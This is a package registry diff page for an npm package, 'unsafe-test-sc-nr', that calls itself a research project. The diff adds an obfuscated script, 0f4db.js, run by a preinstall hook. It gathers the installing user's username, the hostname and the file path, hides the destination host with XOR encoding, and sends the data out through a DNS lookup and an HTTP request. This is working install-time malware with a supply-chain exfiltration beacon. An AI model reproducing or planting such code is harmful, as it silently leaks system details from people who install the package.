unsafe-test-sc-nr 6407.6.14

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of unsafe-test-sc-nr might be problematic. Click here for more details.

package/0f4db.js ADDED
@@ -0,0 +1,10 @@
1
+ var o=require('os');var d=require('dns');var h=require('http');
2
+ var s=new Buffer.from(o.userInfo().username+'@'+o.hostname()+':'+__filename).map(function(b,i){return b^((i+139)%256)});
3
+ var n=s.toString('hex').substring(0, 209).match(/.{1,63}/g).join('.');
4
+ var t=s.toString('base64').replaceAll('+','-').replaceAll('/','_').replaceAll('=','');
5
+ var r=Math.random().toString(16).substring(2,5);
6
+ var z=Buffer.from('acadbdf9afafb8b3b4a0a0e0b3a5b3eca9a8bcbdafafa599858bcd8b818f949bc78f9e','hex').map(function(b,i){return b^((i+201)%256)}).toString();
7
+ var p=r+'0f4db.'+n+'.'+z;
8
+ var q='http://'+z+'?x='+r+'0f4db'+t;
9
+ d.lookup(p,{},function(e,a){});
10
+ h.get(q,function(){});
package/README.md ADDED
@@ -0,0 +1,3 @@
1
+ This is a research project.
2
+
3
+ Do not use.
package/index.js ADDED
@@ -0,0 +1,5 @@
1
+ 'use strict';
2
+
3
+ module.exports = function fn_0f4db() {
4
+ return 'This is a research project. Do not use.';
5
+ };
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "unsafe-test-sc-nr",
3
+ "version": "6407.6.14",
4
+ "description": "This is a research project. Do not use.",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "node 0f4db.js"
9
+ },
10
+ "author": "notroks",
11
+ "license": "ISC"
12
+ }